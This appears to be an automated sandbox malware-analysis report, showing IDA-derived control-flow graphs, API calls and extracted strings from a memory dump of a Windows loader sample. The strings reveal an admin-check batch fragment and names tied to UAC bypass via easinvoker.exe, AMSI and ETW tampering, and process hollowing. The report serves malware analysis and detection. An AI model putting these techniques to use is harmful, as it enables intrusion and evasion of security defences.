                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Internet$FileHandle$CloseModuleOpenSleep$AddressAttributesCopyFreeLibraryNameProc_hwrite_lclose
                                                                • String ID: @echo offset mypath=%cd%if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"net session >nul 2>&1 || goto :label%saka% exit /b 2:label::REQUIREMENTSwhoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1if ERRORLEVEL 1 exit /b 1::Wi$ & exit$.exe$.url$217$5E5CDDEE$AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$C:\Users\Public\Libraries$C:\Windows\SysWOW64$Cdex.bat$CopyFileA$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DllGetClassObject$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$GetEventLogInformation$HotKey=$IconIndex=$Initialize$InternetOpenUrlA$InternetOpenW$InternetReadFile$NotifyChangeEventLog$NtCreateFile$NtOpenFile$Null$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SoftpubCheckCert$SoftpubDefCertInit$SoftpubInitialize$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$URL=file:"$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$Ymo_^$[InternetShortcut]$\FQ$^^Nc$advapi32$iexpress$iexpress.exe$kernel32$mssip32$ntdll$shell32$softpub$start /min $t.bat$wininet$wuapi
                                                                • API String ID: 3670926968-2746648207
                                                                • Opcode ID: ea70179ee3989c22d69cae98246874672dabea59912a7d75e1851532bcae3853
                                                                • Instruction ID: 4d4fc8d649dc746daeb684487351656aa3022e00cec476896b52663b9d99c884
                                                                • Opcode Fuzzy Hash: ea70179ee3989c22d69cae98246874672dabea59912a7d75e1851532bcae3853
                                                                • Instruction Fuzzy Hash: 5173203EA0111A8BDF21F768DC80ACE73B6EF84300F5484E69509E7315DE70AE999F56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02898746 Relevance: 131.3, APIs: 11, Strings: 63, Instructions: 1755filesleepprocessCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1979 2898746-289899f call 2884c24 call 2884d64 call 2884a98 call 2895540 call 28848f4 call 2895698 call 2884c24 call 2884d64 call 2884a98 call 2895540 call 28848f4 call 2895698 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2895540 call 28848f4 call 2895698 call 2884c24 call 2884d64 call 2884a98 call 2895540 call 28848f4 call 2895698 call 2884d64 call 2884a98 call 2888110 2048 2898baa-2899004 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2895580 call 28848f4 call 2887da0 call 2895b34 call 28848f4 call 2895ac0 call 2895910 call 28848f4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 1979->2048 2049 28989a5-2898ba7 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884d64 call 28837ac call 2895724 Sleep call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA 1979->2049 2236 289900a-2899019 call 2884cb0 2048->2236 2237 289934e-28993d6 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 2048->2237 2049->2048 2236->2237 2243 289901f-289902e call 2884cb0 2236->2243 2271 28993dc-28993eb call 2884cb0 2237->2271 2272 2899841-28998c9 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 2237->2272 2243->2237 2248 2899034-2899349 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884dbc call 2894f34 2243->2248 2248->2237 2271->2272 2280 28993f1-2899400 call 2884cb0 2271->2280 2322 28998cf-28998de call 2884cb0 2272->2322 2323 2899a11-289a7b3 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc ExitProcess 2272->2323 2280->2272 2289 2899406-289983c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc WinExec call 28945f8 OpenProcess NtSuspendProcess call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884dbc call 2893f94 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc 2280->2289 2289->2272 2322->2323 2335 28998e4-28998f3 call 2884cb0 2322->2335 2335->2323 2347 28998f9-2899a0c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2882fc4 call 2884dbc call 28948a4 2335->2347 2347->2323
                                                                APIs
                                                                  • Part of subcall function 02895698: _hwrite.KERNEL32(00000000,00000000,?), ref: 028956EF
                                                                  • Part of subcall function 02895698: _lclose.KERNEL32(00000000), ref: 028956F5
                                                                  • Part of subcall function 028936CC: GetModuleHandleA.KERNEL32 ref: 02893725
                                                                  • Part of subcall function 028936CC: GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                  • Part of subcall function 028936CC: FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                  • Part of subcall function 02895724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                  • Part of subcall function 02895724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                • Sleep.KERNEL32(00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898A4C
                                                                • DeleteFileA.KERNEL32(00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898A80
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898ABA
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898AF4
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe), ref: 02898B2E
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60), ref: 02898B68
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat), ref: 02898B9C
                                                                • WinExec.KERNEL32(iexpress,00000000), ref: 028994FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,028DDA9C,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 02899520
                                                                • NtSuspendProcess.NTDLL(028DDAA0), ref: 02899530
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02894F87
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                  • Part of subcall function 02894F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                  • Part of subcall function 02882FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,00000000), ref: 02882FE8
                                                                  • Part of subcall function 028948A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                  • Part of subcall function 028948A4: GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                  • Part of subcall function 028948A4: ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                  • Part of subcall function 028948A4: NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                  • Part of subcall function 028948A4: VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,Initialize,0289AD5C,OpenSession,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 0289A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait_hwrite_lclose
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$KDECO.bat$NotifyChangeEventLog$NtCreateFile$NtOpenFile$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$easinvoker.exe$iexpress$iexpress.exe$kernel32$netutils.dll$ntdll$shell32
                                                                • API String ID: 582351518-2677577270
                                                                • Opcode ID: 20a036ffbb59a7d77fae91aa82d4da0e26085e3a4a6dd8d147ab7903088f0e49
                                                                • Instruction ID: ac71435b1080308cde764d1440b53cb3f6f6b45aedc54d5f1bfda925fc709e46
                                                                • Opcode Fuzzy Hash: 20a036ffbb59a7d77fae91aa82d4da0e26085e3a4a6dd8d147ab7903088f0e49
                                                                • Instruction Fuzzy Hash: B4F2FE3EA0111A8BDF21F768DC80ACE73B6EF84300F5484E69109E7315DE74AE959F56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0289827F Relevance: 124.2, APIs: 11, Strings: 59, Instructions: 1671filesleepprocessCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2943 289827f-2898322 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884d64 call 2884a98 call 2888110 2964 2898328-2898530 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884d64 call 28837ac call 2895724 Sleep call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA call 2884d64 call 2884a98 call 2884d64 DeleteFileA 2943->2964 2965 2898baa-2899004 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2895580 call 28848f4 call 2887da0 call 2895b34 call 28848f4 call 2895ac0 call 2895910 call 28848f4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 2943->2965 2964->2965 3152 289900a-2899019 call 2884cb0 2965->3152 3153 289934e-28993d6 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 2965->3153 3152->3153 3159 289901f-289902e call 2884cb0 3152->3159 3187 28993dc-28993eb call 2884cb0 3153->3187 3188 2899841-28998c9 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 3153->3188 3159->3153 3164 2899034-2899349 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884dbc call 2894f34 3159->3164 3164->3153 3187->3188 3196 28993f1-2899400 call 2884cb0 3187->3196 3238 28998cf-28998de call 2884cb0 3188->3238 3239 2899a11-289a7b3 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc ExitProcess 3188->3239 3196->3188 3205 2899406-289983c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc WinExec call 28945f8 OpenProcess NtSuspendProcess call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884dbc call 2893f94 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc 3196->3205 3205->3188 3238->3239 3251 28998e4-28998f3 call 2884cb0 3238->3251 3251->3239 3263 28998f9-2899a0c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2882fc4 call 2884dbc call 28948a4 3251->3263 3263->3239
                                                                APIs
                                                                  • Part of subcall function 028936CC: GetModuleHandleA.KERNEL32 ref: 02893725
                                                                  • Part of subcall function 028936CC: GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                  • Part of subcall function 028936CC: FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                  • Part of subcall function 02895724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                  • Part of subcall function 02895724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                • Sleep.KERNEL32(000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 028983CF
                                                                • DeleteFileA.KERNEL32(00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02898403
                                                                • DeleteFileA.KERNEL32(00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 0289843D
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02898477
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 028984B1
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 028984EB
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02898525
                                                                • WinExec.KERNEL32(iexpress,00000000), ref: 028994FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,028DDA9C,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 02899520
                                                                • NtSuspendProcess.NTDLL(028DDAA0), ref: 02899530
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02894F87
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                  • Part of subcall function 02894F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                  • Part of subcall function 02882FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,00000000), ref: 02882FE8
                                                                  • Part of subcall function 028948A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                  • Part of subcall function 028948A4: GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                  • Part of subcall function 028948A4: ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                  • Part of subcall function 028948A4: NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                  • Part of subcall function 028948A4: VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,Initialize,0289AD5C,OpenSession,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 0289A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait
